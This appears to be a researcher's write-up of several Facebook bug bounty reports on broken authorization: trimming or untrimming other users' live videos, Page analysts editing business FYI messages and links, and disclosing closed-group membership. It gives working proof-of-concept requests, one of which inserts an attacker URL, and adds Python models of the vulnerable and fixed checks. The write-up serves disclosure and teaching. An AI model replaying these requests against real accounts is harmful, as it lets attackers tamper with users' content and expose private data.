Description / Impact

It’s possible to untrim any live video on Facebook on behalf of the owners.

Impact

This could let a malicious user untrim any live video on Facebook through a non-GraphQL endpoint (/video_broadcast/trim/) that accepts any video_id without checking that the caller owns the video.

Proof of Concept / Repro steps

1. Obtain the target live video ID.
2. Submit the request below with that value as video_id (remember to update your CSRF token, the fb_dtsg parameter).

POST /video_broadcast/trim/?new_start_seconds=0&new_end_seconds=99999999&reset_trimming=1&video_id=valueFromStep1&fb_dtsg= HTTP/1.1
Host: facebook.com

Response

{
  "__ar": 1,
  "payload": {},
  "hsrp": {
    "hblp": {
      "sr_revision": 1002775749,
      "consistency": {
        "rev": 1002775749
      }
    }
  }
}

The target live video has been untrimmed on behalf of its owner.

Timeline:

06/10/2020 : Report sent

Triaged by Facebook after 6 hours

10/10/2020: $2875 bounty awarded during BountyCon 2020 (with bonus)

21/10/2020: Patch confirmed by Facebook


Description / Impact

In FB5 there is a COVID-19 related update that allows a Page to announce a change to its customer service as a result of the Coronavirus. This action requires high permissions to be performed on behalf of the Page, but according to my testing I observed that it is possible to update the business FYI message with only the analyst permission.

This behavior is unexpected, since the analyst permission is generally a read-only permission.

Proof of Concept / Repro steps

  • Obtain the Page ID.
  • Submit the following request as a user who holds only the analyst role on the Page (av, page_id and actor_id are all the Page ID from the first step):

POST /api/graphql/?av=valueObtainedFromStepOne HTTP/1.1
Host: facebook.com

variables={"input":{"business_fyi_message_type":"POLICY_UPDATES","end_point":"settings_page_info","entry_point":"page_settings","page_id":"valueObtainedFromStepOne","actor_id":"valueObtainedFromStepOne","client_mutation_id":"4"}}&doc_id=2964825706964540

  • To display a button on the Page that links to your own URL, submit:

POST /api/graphql/?av=valueObtainedFromStepOne HTTP/1.1
Host: facebook.com

variables={"input":{"business_fyi_link":"https://www.attackerSite.com/","end_point":"settings_page_info","entry_point":"page_settings","page_id":"valueObtainedFromStepOne","actor_id":"valueObtainedFromStepOne","client_mutation_id":"1"}}&doc_id=2674516042648125


Description / Impact

There is a feature (video trimming) which allows Facebook users to remove unnecessary content from their live videos. Only the owner can do this to their own video, but according to my testing I observed that it is possible to trim any live video on behalf of the owner, which is not the expected behavior.

Impact

Anyone can trim any live video on Facebook. Trimming a video down to 5 milliseconds will cause the video to be 0 seconds long, and the owner won't be able to untrim it.

Proof of Concept / Repro steps

1. Obtain the target live video ID.
2. Obtain the current user ID (your own account, the actor).
3. Copy the request below, substituting both values (start_time_ms and end_time_ms are in milliseconds):

POST /api/graphql/?__a=1&doc_id=3975916122480615&variables={"input":{"end_time_ms":12000,"start_time_ms":0,"video_id":"valueFromStepOne","actor_id":"ValueFromStepTwo","client_mutation_id":"1"}} HTTP/1.1

4. Update…
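The three reports above (untrim, business FYI, trim) come down to the same defect: a mutation names its target in the request (video_id, page_id) but never ties the acting user to that target. The Python model below is an added example, not Facebook's code. The LiveVideo and Page objects, the role names, PAGE_WRITE_ROLES and the handler functions are assumptions made for illustration; each vulnerable handler reproduces the behaviour the report describes, and the fixed one adds the missing object-level check.

```python
from dataclasses import dataclass, field
from typing import Optional


class Forbidden(Exception):
    """The actor is logged in but may not perform this mutation."""


@dataclass
class LiveVideo:
    video_id: str
    owner_id: str
    duration_ms: int
    start_ms: int = 0
    end_ms: Optional[int] = None   # None: not trimmed yet

    def __post_init__(self):
        if self.end_ms is None:
            self.end_ms = self.duration_ms


@dataclass
class Page:
    page_id: str
    roles: dict = field(default_factory=dict)         # user_id -> role name (assumed model)
    business_fyi: dict = field(default_factory=dict)  # message_type, link, ...


# Assumption for the model: only these Page roles may change settings; ANALYST is read-only.
PAGE_WRITE_ROLES = {"ADMIN", "EDITOR"}


def trim_video_vulnerable(videos, actor_id, video_id, start_ms, end_ms, reset=False):
    """Reports 1 and 3: video_id comes from the request and the owner is never
    compared with the actor, so any logged-in user can trim or untrim any video."""
    video = videos[video_id]
    if reset:
        start_ms, end_ms = 0, video.duration_ms
    video.start_ms, video.end_ms = start_ms, end_ms
    return video


def trim_video_fixed(videos, actor_id, video_id, start_ms, end_ms, reset=False):
    """Same mutation with the check tied to the object named in the request."""
    video = videos[video_id]
    if video.owner_id != actor_id:
        raise Forbidden(f"{actor_id} does not own video {video_id}")
    if reset:
        start_ms, end_ms = 0, video.duration_ms
    if not 0 <= start_ms < end_ms <= video.duration_ms:
        raise ValueError("trim range must be non-empty and inside the video")
    video.start_ms, video.end_ms = start_ms, end_ms
    return video


def update_business_fyi_vulnerable(pages, actor_id, page_id, **fields):
    """Report 2: only 'has some role on the Page' is checked, so ANALYST can write."""
    page = pages[page_id]
    if actor_id not in page.roles:
        raise Forbidden(f"{actor_id} has no role on page {page_id}")
    page.business_fyi.update(fields)
    return page


def update_business_fyi_fixed(pages, actor_id, page_id, **fields):
    """Check the specific role, not mere presence on the Page."""
    page = pages[page_id]
    if page.roles.get(actor_id) not in PAGE_WRITE_ROLES:
        raise Forbidden(f"{actor_id} may not edit page {page_id}")
    page.business_fyi.update(fields)
    return page


def outcome(fn, *args, **kwargs):
    """Run a handler and classify the result (helper for the scenarios below)."""
    try:
        fn(*args, **kwargs)
        return "ok"
    except Forbidden:
        return "forbidden"
    except ValueError:
        return "invalid"


def run_scenarios():
    """Replay the three reports against both handler versions (constructed data)."""
    videos = {"v1": LiveVideo("v1", owner_id="owner", duration_ms=60_000)}
    pages = {"p1": Page("p1", roles={"admin": "ADMIN", "analyst": "ANALYST"})}
    link = "https://www.attackerSite.com/"
    return {
        # report 3: a stranger trims the owner's video down to 5 ms
        "attacker_trim_vuln": outcome(trim_video_vulnerable, videos, "attacker", "v1", 0, 5),
        "attacker_trim_fixed": outcome(trim_video_fixed, videos, "attacker", "v1", 0, 5),
        # report 1: a stranger resets (untrims) the owner's video
        "attacker_untrim_vuln": outcome(trim_video_vulnerable, videos, "attacker", "v1", 0, 0, reset=True),
        "attacker_untrim_fixed": outcome(trim_video_fixed, videos, "attacker", "v1", 0, 0, reset=True),
        # the owner keeps both abilities under the fix
        "owner_trim_fixed": outcome(trim_video_fixed, videos, "owner", "v1", 1_000, 30_000),
        "owner_untrim_fixed": outcome(trim_video_fixed, videos, "owner", "v1", 0, 0, reset=True),
        # report 2: the analyst publishes a notice and an attacker-controlled link
        "analyst_fyi_vuln": outcome(update_business_fyi_vulnerable, pages, "analyst", "p1",
                                    business_fyi_message_type="POLICY_UPDATES", business_fyi_link=link),
        "analyst_fyi_fixed": outcome(update_business_fyi_fixed, pages, "analyst", "p1", business_fyi_link=link),
        "admin_fyi_fixed": outcome(update_business_fyi_fixed, pages, "admin", "p1", business_fyi_link=link),
    }
```

Calling run_scenarios() shows the attacker succeeding only against the vulnerable handlers. Note that the fix is not "is the user logged in" (the requests already carry a valid session and fb_dtsg) but "does this actor own, or hold a writing role on, the exact object whose ID the request names".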


Description / Impact

When a Facebook user is approved as a member of a closed group, only the group's members and admins have permission to see his/her membership, but according to my testing I found that any non-member is able to disclose the approved members of any closed Facebook group.

Proof of Concept / Repro steps

  • Submit the following request as user (A), just before user (B) has any kind of relationship with the closed group (D):

POST /api/graphql/?doc_id=2416329748453695 HTTP/1.1
Host: facebook.com

variables=%7B%22groupID%22%3A%22Group_D_ID%22%2C%22memberID%22%3A%22User_B_ID%22%7D

(URL-decoded: variables={"groupID":"Group_D_ID","memberID":"User_B_ID"})

Response

{ 
"data":{
"group":{
"id":"2082572965383830",
"can_viewer_claim_adminship":false,
"membership":null
}
}
}

membership is null here because there has been no relationship in the past between user (B) and the closed group (D).

  • Now repeat step 1 just after…
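The report above describes an oracle: the membership field is null while user (B) has no relationship with group (D), and the response changes once B is approved, so a non-member viewer can test any user ID against any closed group. The Python model below is an added example, not Facebook's code. The Group object, the visibility rule in can_view_membership and the resolver names are assumptions; the request string and response shape are the ones shown in the report, and decode_variables recovers the GraphQL variables from the percent-encoded query string.

```python
import json
from dataclasses import dataclass, field
from urllib.parse import parse_qs


@dataclass
class Group:
    group_id: str
    privacy: str                                # "OPEN" or "CLOSED"
    admins: set = field(default_factory=set)
    members: set = field(default_factory=set)   # approved members, admins included


def decode_variables(query_string):
    """Decode the percent-encoded `variables` parameter of the request above."""
    return json.loads(parse_qs(query_string)["variables"][0])


def can_view_membership(group, viewer_id):
    """Assumed rule: membership of a closed group is visible only to its members and admins."""
    return group.privacy != "CLOSED" or viewer_id in group.members or viewer_id in group.admins


def _membership_edge(group, member_id):
    return {"id": f"{group.group_id}:{member_id}", "join_status": "MEMBER"}


def _envelope(group_id, membership):
    # Same shape as the response shown in the report.
    return {"data": {"group": {"id": group_id,
                               "can_viewer_claim_adminship": False,
                               "membership": membership}}}


def resolve_group_vulnerable(groups, viewer_id, group_id, member_id):
    """Resolves membership(memberID) from the data alone and ignores the viewer:
    null for non-members, an object for approved members, whoever asks."""
    group = groups[group_id]
    edge = _membership_edge(group, member_id) if member_id in group.members else None
    return _envelope(group_id, edge)


def resolve_group_fixed(groups, viewer_id, group_id, member_id):
    """Scopes the field to the viewer: someone who may not see membership gets
    null for members and non-members alike, so the field carries no signal."""
    group = groups[group_id]
    edge = None
    if can_view_membership(group, viewer_id) and member_id in group.members:
        edge = _membership_edge(group, member_id)
    return _envelope(group_id, edge)


def membership_oracle(resolver, groups, viewer_id, group_id, candidate_ids):
    """What the viewer learns: the candidates whose membership field is non-null."""
    return {uid for uid in candidate_ids
            if resolver(groups, viewer_id, group_id, uid)["data"]["group"]["membership"] is not None}


def run_scenarios():
    """User (A), a non-member, queries closed group (D) about user (B) before and
    after B is approved (constructed data using the report's placeholder IDs)."""
    groups = {"Group_D_ID": Group("Group_D_ID", "CLOSED", admins={"admin"}, members={"admin"})}
    target = ["User_B_ID"]
    results = {"before_approval_vuln":
               membership_oracle(resolve_group_vulnerable, groups, "User_A_ID", "Group_D_ID", target)}
    groups["Group_D_ID"].members.add("User_B_ID")   # B is approved into D
    results["after_approval_vuln"] = membership_oracle(resolve_group_vulnerable, groups, "User_A_ID", "Group_D_ID", target)
    results["after_approval_fixed"] = membership_oracle(resolve_group_fixed, groups, "User_A_ID", "Group_D_ID", target)
    results["after_approval_fixed_admin_view"] = membership_oracle(resolve_group_fixed, groups, "admin", "Group_D_ID", target)
    return results
```

Two design points worth keeping in mind when fixing this class of bug: the viewer check has to wrap the field, not the whole query (the group's id is public, so the request should still succeed), and the denied case must return exactly what the "no relationship" case returns. Raising an error only when the target is a member would recreate the oracle with a different signal.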

Ahmad Talahmeh

Security Researcher
